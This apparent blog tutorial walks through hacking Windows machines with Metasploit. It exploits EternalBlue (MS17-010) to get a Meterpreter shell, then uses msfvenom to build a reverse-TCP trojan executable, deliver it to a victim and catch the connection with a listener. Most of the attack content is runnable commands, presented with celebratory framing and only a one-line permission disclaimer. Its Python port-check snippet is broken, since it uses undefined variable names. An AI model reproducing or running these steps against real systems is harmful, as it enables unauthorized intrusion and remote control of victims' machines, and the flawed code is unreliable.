H4ck Windows using METASPLOIT π±βπ»
DO NOT HACK ANYONE UNTILL YOU HAVE PERMISSION β
I assume you have a decent linux distro for hacking
or at least Metasploit π±βπ»
- Target's firewall must be turned off
- Attacker and victim must be on same network [ at least attacker must know IP address of victim ]
EternalBlue is a critical vulnerability on _windows 7 and down based on SMB
port 445
Scan the target an check if the targets SMB port is open or not
import socket
target_ip = "target ip" # speicfy your targets ip
target_port = 445
try:
sock = socket.socket()
sock.connect((ip, port))
print("[+] PORT 445 IS OPEN, YOU CAN ATTACK !!")
except:
print("[-] TARGET IS SAFE, TRY ANOTHER WAY TO ATTACK :(")
If targets port is open we can hack π¨βπ»
open Metasploit
sudo msfconsole
after Metasploit started
use exploit/windows/smb/ms17_010_eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
This is a Metasploit prebuild module , you can see the options by typing show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
We will hit up with a lot of options but we are interested only on LHOST
LPORT
RHOSTS
,
Metasploit is kind enough to auto configure LPORT
& LHOST
,
you can change it whenever you need
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set LPORT <ANY_PORT>
simply run the exploit by typing run
or exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
If you done in the right way π£ You should get a Meterpreter shell back
CONGRATULATIONS YOU JUST H4CKED IN TO A SYSTEM ππ₯³π¨βπ»
A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can't imagine
We gonna make one π¨βπ»
Some of the payload generating tools π¨
We are using Msfvenom because it comes preinstalled with metasploit framework, feel free to use other tools you could just read manuals for those π
In the case of payload based attack, we can't just hack into system without having any contact with it, we need a way to deliver payload to victim, but the joyful thing is it just works fine on any windows machine π
Lets rock in roll
generate payload
msfvenom -p [payload_type] -a [victim_architecute] LHOST=[YOUR_IP] LPORT=[ANY_OF_YOUR_PORT] -o payload.exe
You need to replace the [..] part
...
There are many payload types in Msfvenom π
I usually recommend and use
windows/x64/meterpreter/reverse_tcp
for 64 bit deviceswindows/meterpreter/reverse_tcp
for 32 bit devices
You need to specify victim's architecture after -a
x64
for 64 bit devicesx86
for 32 bit devices
...
We successfully created a payload [ also known as backdoor, virus, trojan.. etc ]
We need to start a listener π on Meatsploit
fire up Metasploit
sudo msfconsole
use exploit/multi/handler
use exploit/multi/handler
set the options
set LHOST <IP-SET-IN-PAYLOAD>
set LPORT <PORT-SET-IN-PAYLOAD>
enter run
This will start the listener
wait to victim to execute the payload, You should get a Meterpreter shell back
Congratulations You Had Hacked Into Another System π¨βπ»